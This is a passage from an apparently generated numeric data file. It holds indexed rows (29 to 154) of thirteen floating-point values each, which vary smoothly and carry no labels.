(14.26701956013985, 15.338496982167355, 14.50779862825789, 17.30936054526749, 15.62149168506951, 8.75, 11.506433373678693, 12.839002469135803, 16.95842339506173, 10.979032309099225, 11.715425651577503, 13.627064837677183, 14.175), # 29
(14.279985964225098, 15.318981481481483, 14.502314814814815, 17.30434027777778, 15.628020516063533, 8.75, 11.492619825708061, 12.804166666666665, 16.953125, 10.964506172839508, 11.71233164983165, 13.619753086419752, 14.175), # 30
(14.292631757844802, 15.297046227709194, 14.496139643347053, 17.29867186213992, 15.634382289390214, 8.75, 11.477098216735257, 12.765182716049384, 16.947152530864198, 10.948205550983083, 11.708829118343933, 13.611519524462738, 14.175), # 31
(14.304955826841338, 15.27278340192044, 14.489296159122084, 17.29237258230453, 15.640576748078935, 8.75, 11.4599349713548, 12.72225802469136, 16.940526728395064, 10.930205724737084, 11.704926437211622, 13.602394878829449, 14.175), # 32
(14.316957057057056, 15.246285185185185, 14.481807407407409, 17.28545972222222, 15.646603635159089, 8.75, 11.441196514161222, 12.675600000000001, 16.933268333333334, 10.910581975308643, 11.700631986531986, 13.59240987654321, 14.175), # 33
(14.328634334334335, 15.217643758573388, 14.473696433470508, 17.27795056584362, 15.652462693660054, 8.75, 11.420949269749054, 12.625416049382716, 16.925398086419758, 10.889409583904893, 11.695954146402293, 13.581595244627344, 14.175), # 34
(14.339986544515531, 15.186951303155007, 14.464986282578877, 17.26986239711934, 15.65815366661122, 8.75, 11.399259662712824, 12.571913580246914, 16.916936728395065, 10.866763831732968, 11.690901296919815, 13.569981710105168, 14.175), # 35
(14.35101257344301, 15.1543, 14.455700000000002, 17.2612125, 15.663676297041972, 8.75, 11.37619411764706, 12.515300000000002, 16.907905, 10.84272, 11.685481818181819, 13.557600000000003, 14.175), # 36
(14.361711306959135, 15.119782030178326, 14.445860631001374, 17.252018158436215, 15.669030327981691, 8.75, 11.351819059146292, 12.455782716049384, 16.89832364197531, 10.817353369913125, 11.679704090285574, 13.544480841335163, 14.175), # 37
(14.372081630906267, 15.083489574759948, 14.43549122085048, 17.242296656378603, 15.674215502459768, 8.75, 11.326200911805053, 12.393569135802473, 16.88821339506173, 10.790739222679472, 11.673576493328346, 13.530654961133976, 14.175), # 38
(14.382122431126781, 15.045514814814815, 14.424614814814818, 17.232065277777778, 15.679231563505585, 8.75, 11.299406100217867, 12.328866666666666, 16.877595000000003, 10.762952839506175, 11.667107407407409, 13.516153086419752, 14.175), # 39
(14.39183259346303, 15.005949931412895, 14.413254458161866, 17.221341306584364, 15.684078254148528, 8.75, 11.271501048979264, 12.261882716049385, 16.866489197530868, 10.734069501600368, 11.660305212620028, 13.501005944215823, 14.175), # 40
(14.40121100375738, 14.964887105624143, 14.401433196159124, 17.210142026748972, 15.688755317417984, 8.75, 11.242552182683774, 12.192824691358027, 16.85491672839506, 10.704164490169182, 11.653178289063476, 13.485244261545498, 14.175), # 41
(14.410256547852201, 14.922418518518521, 14.389174074074077, 17.198484722222226, 15.693262496343333, 8.75, 11.212625925925927, 12.121900000000002, 16.842898333333338, 10.673313086419753, 11.645735016835017, 13.4688987654321, 14.175), # 42
(14.418968111589852, 14.878636351165984, 14.376500137174213, 17.186386676954736, 15.697599533953966, 8.75, 11.181788703300251, 12.049316049382718, 16.83045475308642, 10.641590571559215, 11.637983776031925, 13.452000182898951, 14.175), # 43
(14.427344580812699, 14.83363278463649, 14.363434430727025, 17.173865174897124, 15.701766173279264, 8.75, 11.150106939401276, 11.975280246913583, 16.817606728395063, 10.609072226794698, 11.629932946751465, 13.434579240969367, 14.175), # 44
(14.435384841363105, 14.787500000000001, 14.350000000000001, 17.160937500000003, 15.705762157348616, 8.75, 11.11764705882353, 11.9, 16.804375, 10.575833333333335, 11.62159090909091, 13.416666666666666, 14.175), # 45
(14.443087779083434, 14.740330178326476, 14.336219890260631, 17.147620936213993, 15.709587229191404, 8.75, 11.084475486161544, 11.823682716049385, 16.790780308641974, 10.541949172382258, 11.612966043147525, 13.398293187014175, 14.175), # 46
(14.45045227981605, 14.692215500685872, 14.322117146776408, 17.133932767489714, 15.713241131837016, 8.75, 11.050658646009847, 11.746535802469136, 16.776843395061732, 10.507495025148607, 11.604066729018582, 13.37948952903521, 14.175), # 47
(14.457477229403315, 14.64324814814815, 14.307714814814817, 17.11989027777778, 15.716723608314837, 8.75, 11.016262962962964, 11.668766666666668, 16.762585, 10.472546172839506, 11.594901346801347, 13.360286419753088, 14.175), # 48
(14.464161513687602, 14.593520301783265, 14.29303593964335, 17.10551075102881, 15.720034401654251, 8.75, 10.981354861615428, 11.590582716049383, 16.748025864197533, 10.437177896662096, 11.585478276593093, 13.340714586191131, 14.175), # 49
(14.470504018511264, 14.543124142661183, 14.278103566529495, 17.090811471193415, 15.723173254884642, 8.75, 10.94600076656177, 11.512191358024692, 16.73318672839506, 10.401465477823503, 11.575805898491085, 13.32080475537266, 14.175), # 50
(14.476503629716676, 14.492151851851853, 14.262940740740742, 17.075809722222225, 15.726139911035398, 8.75, 10.910267102396515, 11.433800000000002, 16.718088333333338, 10.365484197530865, 11.565892592592595, 13.30058765432099, 14.175), # 51
(14.482159233146191, 14.440695610425243, 14.247570507544584, 17.060522788065846, 15.728934113135901, 8.75, 10.874220293714194, 11.355616049382716, 16.70275141975309, 10.329309336991313, 11.555746738994888, 13.280094010059445, 14.175), # 52
(14.487469714642183, 14.388847599451307, 14.232015912208508, 17.0449679526749, 15.731555604215542, 8.75, 10.837926765109337, 11.277846913580248, 16.687196728395065, 10.293016177411982, 11.545376717795238, 13.259354549611341, 14.175), # 53
(14.492433960047004, 14.336700000000002, 14.2163, 17.0291625, 15.734004127303704, 8.75, 10.801452941176471, 11.2007, 16.671445000000002, 10.256680000000001, 11.534790909090908, 13.2384, 14.175), # 54
(14.497050855203032, 14.284344993141291, 14.200445816186559, 17.01312371399177, 15.736279425429768, 8.75, 10.764865246510128, 11.124382716049384, 16.655516975308643, 10.220376085962506, 11.523997692979176, 13.217261088248744, 14.175), # 55
(14.501319285952622, 14.231874759945132, 14.184476406035667, 16.996868878600825, 15.738381241623124, 8.75, 10.728230105704835, 11.049102469135804, 16.63943339506173, 10.184179716506632, 11.513005449557303, 13.195968541380887, 14.175), # 56
(14.505238138138138, 14.179381481481483, 14.168414814814819, 16.98041527777778, 15.740309318913155, 8.75, 10.69161394335512, 10.975066666666669, 16.623215000000002, 10.148166172839508, 11.50182255892256, 13.174553086419753, 14.175), # 57
(14.508806297601952, 14.126957338820304, 14.152284087791497, 16.96378019547325, 15.742063400329245, 8.75, 10.655083184055517, 10.902482716049382, 16.606882530864198, 10.112410736168268, 11.490457401172218, 13.153045450388662, 14.175), # 58
(14.51202265018642, 14.07469451303155, 14.136107270233198, 16.946980915637862, 15.743643228900785, 8.75, 10.61870425240055, 10.83155802469136, 16.590456728395065, 10.076988687700048, 11.478918356403542, 13.131476360310929, 14.175), # 59
(14.51488608173391, 14.022685185185187, 14.119907407407407, 16.930034722222224, 15.745048547657152, 8.75, 10.582543572984749, 10.762500000000001, 16.573958333333337, 10.041975308641977, 11.467213804713806, 13.109876543209879, 14.175), # 60
(14.517395478086781, 13.971021536351168, 14.10370754458162, 16.912958899176957, 15.746279099627737, 8.75, 10.546667570402647, 10.695516049382718, 16.557408086419755, 10.00744588020119, 11.455352126200275, 13.088276726108827, 14.175), # 61
(14.519549725087407, 13.919795747599453, 14.087530727023323, 16.89577073045268, 15.74733462784193, 8.75, 10.51114266924877, 10.630813580246915, 16.540826728395064, 9.973475683584821, 11.44334170096022, 13.066707636031095, 14.175), # 62
(14.521347708578144, 13.869100000000001, 14.071400000000002, 16.878487500000002, 15.7482148753291, 8.75, 10.476035294117647, 10.568600000000002, 16.524235, 9.94014, 11.43119090909091, 13.045200000000001, 14.175), # 63
(14.522788314401359, 13.819026474622772, 14.05533840877915, 16.86112649176955, 15.74891958511865, 8.75, 10.44141186960381, 10.509082716049384, 16.50765364197531, 9.907514110653864, 11.41890813068961, 13.023784545038868, 14.175), # 64
(14.523870428399414, 13.769667352537724, 14.03936899862826, 16.843704989711934, 15.749448500239955, 8.75, 10.407338820301785, 10.45246913580247, 16.49110339506173, 9.875673296753543, 11.4065017458536, 13.00249199817101, 14.175), # 65
(14.524592936414676, 13.721114814814818, 14.023514814814817, 16.826240277777778, 15.749801363722403, 8.75, 10.373882570806101, 10.398966666666668, 16.474605000000004, 9.844692839506173, 11.393980134680135, 12.981353086419755, 14.175), # 66
(14.524954724289511, 13.673461042524005, 14.00779890260631, 16.808749639917696, 15.749977918595382, 8.75, 10.341109545711289, 10.348782716049385, 16.458179197530864, 9.814648020118886, 11.381351677266494, 12.960398536808412, 14.175), # 67
(14.524708260273156, 13.626548095048452, 13.99216832990398, 16.7910984366613, 15.749829137416285, 8.74983761621704, 10.308921272761506, 10.301681390032009, 16.44172298811157, 9.785468618306034, 11.368400383956526, 12.939542030659641, 14.174825210048013), # 68
(14.522398389694043, 13.578943727598569, 13.976183796296295, 16.772396920289854, 15.748474945533768, 8.748553909465022, 10.27637545388526, 10.25513827160494, 16.424516975308645, 9.756328946986201, 11.35380797448166, 12.918106562703056, 14.17344039351852), # 69
(14.517840102582454, 13.5304294437807, 13.95977580589849, 16.752521973966722, 15.74579903978052, 8.746025758268557, 10.243324188385918, 10.208733424782809, 16.40646404892547, 9.727087334247829, 11.337408441136512, 12.895991865809934, 14.170705268347055), # 70
(14.511097524900102, 13.481034236028144, 13.942950120027435, 16.731502905260335, 15.74183531025579, 8.742294131992075, 10.209782323354585, 10.162482213077277, 16.387591095107457, 9.697744503079695, 11.319262319097408, 12.873214112097802, 14.166655842764062), # 71
(14.502234782608697, 13.430787096774193, 13.9257125, 16.709369021739132, 15.736617647058825, 8.737400000000001, 10.175764705882354, 10.1164, 16.367925000000003, 9.668301176470589, 11.299430143540672, 12.849789473684211, 14.161328125), # 72
(14.491316001669949, 13.379717018452144, 13.90806870713306, 16.686149630971553, 15.730179940288872, 8.73138433165676, 10.141286183060329, 10.070502149062644, 16.347492649748517, 9.63875807740929, 11.277972449642624, 12.825734122686688, 14.154758123285324), # 73
(14.478405308045566, 13.32785299349529, 13.890024502743485, 16.661874040526033, 15.722556080045187, 8.72428809632678, 10.106361601979613, 10.024804023776863, 16.3263209304984, 9.609115928884586, 11.254949772579598, 12.801064231222776, 14.146981845850483), # 74
(14.463566827697262, 13.275224014336917, 13.871585648148148, 16.636571557971017, 15.713779956427018, 8.716152263374488, 10.0710058097313, 9.979320987654322, 16.30443672839506, 9.579375453885259, 11.23042264752791, 12.775795971410007, 14.138035300925928), # 75
(14.44686468658675, 13.22185907341033, 13.852757904663925, 16.610271490874936, 15.703885459533609, 8.707017802164305, 10.035233653406493, 9.934068404206677, 16.281866929583906, 9.549537375400092, 11.20445160966389, 12.749945515365916, 14.127954496742113), # 76
(14.428363010675731, 13.167787163148816, 13.833547033607681, 16.583003146806227, 15.692906479464213, 8.696925682060662, 9.999059980096293, 9.88906163694559, 16.258638420210335, 9.519602416417872, 11.177097194163862, 12.723529035208049, 14.116775441529496), # 77
(14.408125925925928, 13.113037275985667, 13.813958796296298, 16.554795833333333, 15.680876906318085, 8.685916872427983, 9.962499636891796, 9.844316049382718, 16.23477808641975, 9.489571299927379, 11.148419936204148, 12.696562703053933, 14.10453414351852), # 78
(14.386217558299041, 13.057638404354178, 13.793998954046641, 16.525678858024694, 15.667830630194468, 8.674032342630696, 9.925567470884102, 9.799847005029722, 16.210312814357568, 9.4594447489174, 11.118480370961072, 12.669062691021107, 14.091266610939643), # 79
(14.362702033756786, 13.001619540687642, 13.773673268175584, 16.495681528448742, 15.653801541192612, 8.661313062033226, 9.888278329164315, 9.755669867398264, 16.185269490169183, 9.429223486376719, 11.087339033610965, 12.64104517122711, 14.07700885202332), # 80
(14.337643478260873, 12.945009677419357, 13.752987500000001, 16.464833152173917, 15.638823529411765, 8.6478, 9.85064705882353, 9.711800000000002, 16.159675, 9.398908235294119, 11.055056459330146, 12.612526315789475, 14.061796875), # 81
(14.311106017773009, 12.887837806982612, 13.731947410836765, 16.433163036768654, 15.622930484951183, 8.633534125895444, 9.812688506952853, 9.668252766346594, 16.133556229995428, 9.368499718658382, 11.02169318329494, 12.583522296825743, 14.045666688100141), # 82
(14.283153778254908, 12.8301329218107, 13.710558762002744, 16.400700489801395, 15.606156297910111, 8.618556409083983, 9.774417520643375, 9.625043529949703, 16.10694006630087, 9.337998659458297, 10.987309740681672, 12.554049286453447, 14.028654299554185), # 83
(14.253850885668278, 12.77192401433692, 13.688827314814816, 16.36747481884058, 15.588534858387801, 8.602907818930042, 9.735848946986202, 9.582187654320988, 16.07985339506173, 9.307405780682645, 10.951966666666667, 12.524123456790125, 14.010795717592593), # 84
(14.223261465974833, 12.713240076994557, 13.666758830589849, 16.333515331454645, 15.5701000564835, 8.58662932479805, 9.696997633072435, 9.53970050297211, 16.05232310242341, 9.276721805320209, 10.915724496426252, 12.493760979953313, 13.992126950445819), # 85
(14.191449645136279, 12.654110102216913, 13.644359070644722, 16.298851335212028, 15.550885782296458, 8.569761896052432, 9.65787842599317, 9.497597439414724, 16.024376074531325, 9.245947456359774, 10.878643765136749, 12.462978028060553, 13.97268400634431), # 86
(14.15847954911433, 12.594563082437277, 13.621633796296296, 16.26351213768116, 15.53092592592593, 8.552346502057613, 9.618506172839506, 9.455893827160494, 15.996039197530868, 9.215083456790124, 10.840785007974482, 12.43179077322937, 13.95250289351852), # 87
(14.124415303870702, 12.534628010088941, 13.598588768861456, 16.22752704643049, 15.510254377471155, 8.534424112178023, 9.578895720702548, 9.414605029721079, 15.967339357567447, 9.184130529600042, 10.802208760115779, 12.400215387577312, 13.931619620198905), # 88
(14.089321035367092, 12.474333877605204, 13.575229749657066, 16.19092536902845, 15.488905027031391, 8.516035695778085, 9.539061916673392, 9.37374641060814, 15.938303440786468, 9.153089397778317, 10.762975556736963, 12.36826804322191, 13.910070194615912), # 89
(14.053260869565218, 12.413709677419357, 13.551562500000001, 16.153736413043482, 15.466911764705886, 8.497222222222224, 9.499019607843138, 9.333333333333334, 15.908958333333336, 9.121960784313726, 10.723145933014354, 12.335964912280703, 13.887890625), # 90
(14.016298932426789, 12.352784401964689, 13.527592781207133, 16.11598948604402, 15.444308480593882, 8.478024660874867, 9.458783641302887, 9.293381161408323, 15.879330921353455, 9.090745412195057, 10.682780424124285, 12.303322166871226, 13.865116919581618), # 91
(13.978499349913523, 12.2915870436745, 13.503326354595337, 16.0777138955985, 15.421129064794641, 8.458483981100443, 9.418368864143739, 9.253905258344766, 15.84944809099223, 9.059444004411093, 10.641939565243074, 12.270355979111017, 13.841785086591221), # 92
(13.939926247987117, 12.230146594982081, 13.478768981481483, 16.038938949275366, 15.397407407407409, 8.438641152263374, 9.37779012345679, 9.214920987654322, 15.819336728395063, 9.028057283950616, 10.600683891547051, 12.23708252111761, 13.81793113425926), # 93
(13.900643752609293, 12.168492048320722, 13.453926423182445, 15.999693954643051, 15.37317739853143, 8.418537143728091, 9.337062266333147, 9.176443712848654, 15.789023719707364, 8.996585973802416, 10.559073938212535, 12.203517965008546, 13.793591070816188), # 94
(13.860715989741754, 12.106652396123724, 13.42880444101509, 15.960008219269996, 15.34847292826596, 8.398212924859017, 9.296200139863902, 9.138488797439416, 15.758535951074533, 8.96503079695527, 10.517170240415854, 12.169678482901354, 13.768800904492457), # 95
(13.820207085346219, 12.044656630824377, 13.403408796296299, 15.91991105072464, 15.32332788671024, 8.377709465020576, 9.25521859114016, 9.101071604938273, 15.727900308641976, 8.933392476397968, 10.475033333333334, 12.135580246913582, 13.74359664351852), # 96
(13.779181165384388, 11.98253374485597, 13.377745250342937, 15.879431756575416, 15.297776163963531, 8.357067733577198, 9.21413246725302, 9.064207498856883, 15.6971436785551, 8.901671735119288, 10.432723752141296, 12.101239429162758, 13.718014296124831), # 97
(13.737702355817978, 11.9203127306518, 13.35181956447188, 15.83859964439077, 15.271851650125074, 8.336328699893311, 9.17295661529358, 9.027911842706905, 15.666292946959304, 8.86986929610802, 10.390302032016068, 12.066672201766417, 13.69208987054184), # 98
(13.695834782608697, 11.858022580645162, 13.325637500000003, 15.797444021739132, 15.24558823529412, 8.315533333333335, 9.131705882352943, 8.9922, 15.635375000000002, 8.83798588235294, 10.347828708133973, 12.031894736842107, 13.665859375000002), # 99
(13.653642571718258, 11.795692287269347, 13.29920481824417, 15.755994196188944, 15.21901980956992, 8.294722603261699, 9.090395115522204, 8.957087334247829, 15.60441672382259, 8.806022216842843, 10.305364315671335, 11.996923206507354, 13.639358817729768), # 100
(13.611189849108369, 11.733350842957654, 13.272527280521263, 15.714279475308645, 15.192180263051725, 8.273937479042829, 9.049039161892468, 8.922589208962048, 15.573445004572475, 8.773979022566504, 10.262969389804478, 11.961773782879694, 13.612624206961591), # 101
(13.568540740740744, 11.67102724014337, 13.245610648148148, 15.67232916666667, 15.165103485838781, 8.253218930041154, 9.00765286855483, 8.888720987654322, 15.542486728395062, 8.741857022512711, 10.22070446570973, 11.926462638076675, 13.585691550925928), # 102
(13.525759372577088, 11.60875047125979, 13.218460682441702, 15.630172577831457, 15.137823368030341, 8.232607925621096, 8.966251082600394, 8.855498033836307, 15.511568781435757, 8.709656939670245, 10.178630078563414, 11.891005944215824, 13.558596857853223), # 103
(13.482909870579116, 11.546549528740211, 13.191083144718794, 15.587839016371445, 15.110373799725652, 8.212145435147082, 8.924848651120257, 8.822935711019662, 15.480718049839965, 8.677379497027893, 10.13680676354185, 11.855419873414677, 13.53137613597394), # 104
(13.440056360708535, 11.484453405017922, 13.163483796296298, 15.545357789855073, 15.082788671023966, 8.19187242798354, 8.883460421205521, 8.79104938271605, 15.449961419753087, 8.64502541757444, 10.095295055821373, 11.819720597790775, 13.50406539351852), # 105
(13.39726296892706, 11.42249109252622, 13.135668398491084, 15.50275820585078, 15.055101872024531, 8.171829873494895, 8.842101239947283, 8.759854412437129, 15.41932577732053, 8.612595424298663, 10.054155490578298, 11.783924289461654, 13.476700638717421), # 106
(13.3545938211964, 11.360691583698395, 13.10764271262003, 15.460069571927, 15.027347292826596, 8.152058741045574, 8.800785954436646, 8.72936616369456, 15.388838008687703, 8.580090240189355, 10.013448602988953, 11.748047120544847, 13.449317879801098), # 107
(13.312113043478263, 11.299083870967744, 13.079412500000002, 15.417321195652177, 14.999558823529412, 8.132600000000002, 8.759529411764706, 8.699600000000002, 15.358525000000002, 8.547510588235296, 9.973234928229665, 11.712105263157897, 13.421953125000002), # 108
(13.26988476173436, 11.237696946767558, 13.050983521947876, 15.374542384594738, 14.97177035423223, 8.113494619722603, 8.718346459022568, 8.670571284865114, 15.328413637402836, 8.514857191425268, 9.933575001476758, 11.676114889418335, 13.394642382544584), # 109
(13.227973101926404, 11.176559803531132, 13.022361539780524, 15.331762446323136, 14.944015775034297, 8.094783569577809, 8.677251943301325, 8.642295381801555, 15.29853080704161, 8.482130772748057, 9.894529357906551, 11.640092171443701, 13.367421660665297), # 110
(13.186442190016104, 11.11570143369176, 12.993552314814819, 15.2890106884058, 14.91632897603486, 8.076507818930043, 8.636260711692085, 8.614787654320988, 15.26890339506173, 8.449332055192448, 9.856158532695375, 11.60405328135153, 13.340326967592594), # 111
(13.14535615196517, 11.055150829682729, 12.96456160836763, 15.246316418411165, 14.888743847333174, 8.05870833714373, 8.595387611285942, 8.588063465935072, 15.239558287608595, 8.416461761747223, 9.818523061019553, 11.568014391259355, 13.313394311556928), # 112
(13.104705913184263, 10.995038066300333, 12.935464959552897, 15.203767435488858, 14.861245952243188, 8.04141767690032, 8.554736349119478, 8.562193596292849, 15.21059793576207, 8.383626631257822, 9.781693468614014, 11.5320701111062, 13.286621461180511), # 113
(13.064073257060091, 10.935956056935751, 12.906663945030267, 15.161705189788272, 14.833550696392859, 8.024596451941862, 8.514825491774811, 8.537495763307168, 15.182466649998286, 8.351441235077896, 9.745742071958476, 11.496677040958165, 13.25978557982405), # 114
(13.023338864205595, 10.877926078156266, 12.878175705790246, 15.120118307254492, 14.805570749044042, 8.008200917498272, 8.475683510268187, 8.513963715990194, 15.155174970136306, 8.319955459183308, 9.710616315997932, 11.461852615582393, 13.232809284324528), # 115
(12.982451822532688, 10.820863593808383, 12.849945065977423, 15.078932610372966, 14.777263936937292, 7.992192428201937, 8.43724674453905, 8.491532438058591, 15.128653874918964, 8.289110701829367, 9.676248303780074, 11.427532476482286, 13.205650163658248), # 116
(12.941361219953283, 10.76468406773861, 12.82191684973638, 15.038073921629142, 14.748588086813156, 7.976532338685248, 8.399451534526854, 8.47013691322902, 15.102834343089086, 8.258848361271381, 9.642570138352598, 11.39365226516125, 13.178265806801516), # 117
(12.900016144379297, 10.709302963793455, 12.794035881211714, 14.997468063508467, 14.71950102541218, 7.9611820035805945, 8.362234220171041, 8.449712125218136, 15.07764735338951, 8.229109835764664, 9.609513922763194, 11.36014762312269, 13.150613802730636), # 118
(12.858365683722639, 10.654635745819421, 12.766246984548014, 14.95704085849639, 14.689960579474912, 7.946102777520366, 8.325531141411059, 8.430193057742605, 15.053023884563062, 8.199836523564521, 9.577011760059559, 11.326954191870009, 13.122651740421906), # 119
(12.816358925895228, 10.600597877663022, 12.738494983889867, 14.916718129078353, 14.659924575741897, 7.931256015136952, 8.289278638186355, 8.41151469451908, 15.028894915352582, 8.170969822926269, 9.544995753289383, 11.294007612906617, 13.094337208851638), # 120
(12.773944958808976, 10.547104823170763, 12.710724703381864, 14.876425697739808, 14.629350840953688, 7.9166030710627435, 8.253413050436373, 8.39361201926423, 15.0051914245009, 8.142451132105215, 9.513398005500363, 11.261243527735912, 13.065627796996127), # 121
(12.731072870375797, 10.494072046189146, 12.682880967168597, 14.836089386966199, 14.598197201850828, 7.902105299930128, 8.217870718100565, 8.376420015694709, 14.981844390750846, 8.11422184935667, 9.482150619740192, 11.228597577861303, 13.036481093831679), # 122
(12.687691748507607, 10.441415010564684, 12.65490859939465, 14.795635019242972, 14.56642148517387, 7.887724056371495, 8.182587981118376, 8.359873667527177, 14.958784792845258, 8.086223372935942, 9.451185699056563, 11.19600540478619, 13.0068546883346), # 123
(12.643750681116316, 10.389049180143882, 12.62675242420462, 14.754988417055582, 14.533981517663353, 7.873420695019235, 8.147501179429248, 8.343907958478297, 14.935943609526962, 8.058397101098347, 9.420435346497168, 11.163402650013985, 12.976706169481197), # 124
(12.599198756113843, 10.33689001877325, 12.598357265743093, 14.714075402889465, 14.500835126059833, 7.859156570505739, 8.112546652972636, 8.328457872264728, 14.913251819538791, 8.030684432099187, 9.389831665109703, 11.130724955048088, 12.94599312624776), # 125
(12.553985061412101, 10.284852990299292, 12.56966794815466, 14.672821799230077, 14.466940137103851, 7.844893037463395, 8.077660741687978, 8.31345839260313, 14.890640401623585, 8.00302676419378, 9.359306757941859, 11.097907961391908, 12.91467314761061), # 126
(12.508058684923006, 10.232853558568515, 12.540629295583907, 14.63115342856286, 14.432254377535958, 7.830591450524592, 8.042779785514732, 8.298844503210164, 14.86804033452417, 7.975365495637434, 9.32879272804133, 11.064887310548842, 12.88270382254604), # 127
(12.461368714558466, 10.18080718742743, 12.51118613217543, 14.588996113373266, 14.396735674096707, 7.816213164321722, 8.007840124392336, 8.284551187802489, 14.845382596983379, 7.947642024685458, 9.298221678455814, 11.031598644022305, 12.850042740030352), # 128
(12.413864238230394, 10.128629340722538, 12.481283282073816, 14.546275676146736, 14.360341853526638, 7.801719533487173, 7.972778098260239, 8.270513430096765, 14.822598167744045, 7.919797749593164, 9.267525712233, 10.997977603315691, 12.816647489039854), # 129
(12.365494343850713, 10.076235482300353, 12.450865569423652, 14.502917939368722, 14.3230307425663, 7.7870719126533325, 7.937530047057888, 8.256666213809652, 14.799618025549002, 7.89177406861586, 9.236636932420582, 10.963959829932413, 12.78247565855085), # 130
(12.316208119331334, 10.023541076007378, 12.419877818369534, 14.458848725524668, 14.284760167956243, 7.772231656452593, 7.902032310724733, 8.24294452265781, 14.776373149141081, 7.86351238000886, 9.205487442066255, 10.929480965375875, 12.747484837539638), # 131
(12.265954652584163, 9.970461585690122, 12.388264853056045, 14.413993857100023, 14.245487956437017, 7.757160119517344, 7.8662212292002165, 8.229283340357902, 14.752794517263117, 7.834954082027471, 9.17400934421771, 10.894476651149478, 12.711632614982527), # 132
(12.21468303152113, 9.91691247519509, 12.355971497627777, 14.368279156580234, 14.205171934749162, 7.741818656479974, 7.830033142423786, 8.215617650626585, 14.728813108657938, 7.806040572927006, 9.142134741922645, 10.85888252875663, 12.674876579855821), # 133
(12.162342344054133, 9.862809208368793, 12.322942576229327, 14.321630446450746, 14.163769929633231, 7.726168621972872, 7.79340439033489, 8.201882437180522, 14.704359902068381, 7.776713250962773, 9.109795738228751, 10.822634239700733, 12.637174321135817), # 134
(12.108881678095097, 9.808067249057736, 12.289122913005274, 14.273973549197011, 14.12123976782977, 7.710171370628429, 7.756271312872975, 8.18801268373637, 14.679365876237274, 7.746913514390087, 9.07692443618372, 10.785667425485194, 12.59848342779883), # 135
(12.05425012155593, 9.752602061108423, 12.254457332100213, 14.225234287304469, 14.077539276079325, 7.693788257079036, 7.718570249977489, 8.173943374010788, 14.65376200990745, 7.716582761464252, 9.043452938835248, 10.747917727613418, 12.558761488821151), # 136
(11.998396762348548, 9.696329108367367, 12.218890657658735, 14.175338483258576, 14.032626281122448, 7.6769806359570785, 7.6802375415878785, 8.159609491720442, 14.627479281821747, 7.685662390440583, 9.009313349231029, 10.709320787588808, 12.517966093179089), # 137
(11.941270688384867, 9.639163854681073, 12.182367713825425, 14.12421195954477, 13.986458609699687, 7.6597098618949495, 7.6412095276435865, 8.144946020581987, 14.600448670722995, 7.654093799574386, 8.974437770418753, 10.66981224691477, 12.476054829848946), # 138
(11.882820987576796, 9.581021763896047, 12.144833324744877, 14.071780538648504, 13.938994088551583, 7.641937289525037, 7.601422548084064, 8.129887944312085, 14.572601155354022, 7.621818387120976, 8.938758305446116, 10.62932774709471, 12.432985287807028), # 139
(11.822996747836257, 9.521818299858795, 12.106232314561684, 14.017970043055223, 13.890190544418692, 7.623624273479732, 7.560812942848756, 8.114370246627395, 14.543867714457667, 7.588777551335661, 8.902207057360812, 10.58780292963203, 12.38871505602964), # 140
(11.761747057075162, 9.46146892641583, 12.066509507420426, 13.962706295250376, 13.840005804041555, 7.604732168391422, 7.519317051877113, 8.09832791124458, 14.514179326776754, 7.554912690473753, 8.864716129210535, 10.545173436030137, 12.34320172349308), # 141
(11.69902100320542, 9.399889107413653, 12.0256097274657, 13.90591511771941, 13.788397694160723, 7.585222328892499, 7.476871215108577, 8.081695921880296, 14.48346697105412, 7.52016520279056, 8.826217624042977, 10.501374907792433, 12.296402879173653), # 142
(11.634767674138946, 9.336994306698774, 11.983477798842097, 13.847522332947767, 13.735324041516742, 7.56505610961535, 7.4334117724825965, 8.064409262251205, 14.451661626032607, 7.484476486541395, 8.786643644905832, 10.456342986422326, 12.248276112047666), # 143
(11.56893615778766, 9.2726999881177, 11.9400585456942, 13.787453763420901, 13.680742672850162, 7.544194865192366, 7.3888750639386185, 8.04640291607397, 14.418694270455035, 7.4477879399815645, 8.745926294846791, 10.41001331342322, 12.198779011091421), # 144
(11.501475542063469, 9.20692161551694, 11.895296792166606, 13.725635231624254, 13.624611414901528, 7.5225999502559375, 7.343197429416091, 8.027611867065247, 14.384495883064238, 7.410040961366383, 8.703997676913554, 10.36232153029852, 12.14786916528122), # 145
(11.432334914878291, 9.139574652742999, 11.849137362403903, 13.661992560043277, 13.566888094411391, 7.500232719438453, 7.2963152088544625, 8.007971098941699, 14.34899744260305, 7.37117694895116, 8.660789894153808, 10.313203278551628, 12.095504163593366), # 146
(11.361463364144042, 9.070574563642383, 11.801525080550675, 13.596451571163414, 13.507530538120294, 7.477054527372301, 7.2481647421931745, 7.987415595419982, 14.312129927814308, 7.331137300991204, 8.616235049615252, 10.262594199685955, 12.041641595004167), # 147
(11.288809977772631, 8.999836812061604, 11.752404770751518, 13.528938087470117, 13.446496572768787, 7.453026728689875, 7.198682369371678, 7.965880340216761, 14.273824317440841, 7.289863415741826, 8.570265246345576, 10.210429935204898, 11.986239048489919), # 148
(11.214323843675977, 8.927276861847163, 11.701721257151021, 13.459377931448826, 13.38374402509742, 7.42811067802356, 7.147804430329418, 7.943300317048694, 14.234011590225474, 7.247296691458339, 8.522812587392474, 10.156646126611868, 11.929254113026934), # 149
(11.137954049765991, 8.852810176845571, 11.649419363893772, 13.387696925584994, 13.319230721846738, 7.402267730005749, 7.0954672650058415, 7.91961050963244, 14.192622724911054, 7.2033785263960475, 8.473809175803641, 10.101178415410269, 11.870644377591507), # 150
(11.059649683954586, 8.776352220903336, 11.59544391512436, 13.313820892364063, 13.252914489757288, 7.375459239268828, 7.041607213340397, 7.8947459016846615, 14.149588700240406, 7.15805031881027, 8.423187114626767, 10.043962443103501, 11.810367431159946), # 151
(10.979359834153682, 8.697818457866962, 11.539739734987382, 13.237675654271488, 13.184753155569618, 7.34764656044519, 6.986160615272531, 7.8686414769220185, 14.10484049495636, 7.11125346695631, 8.37087850690955, 9.984933851194974, 11.748380862708558), # 152
(10.897033588275185, 8.61712435158296, 11.482251647627416, 13.159187033792707, 13.11470454602428, 7.318791048167222, 6.929063810741687, 7.841232219061167, 14.058309087801755, 7.062929369089481, 8.316815455699683, 9.92402828118809, 11.68464226121364), # 153
(10.81262003423102, 8.534185365897834, 11.422924477189063, 13.078280853413174, 13.042726487861813, 7.288854057067317, 6.87025313968732, 7.8124531118187726, 14.009925457519413, 7.013019423465095, 8.260930064044857, 9.861181374586256, 11.6191092156515), # 154
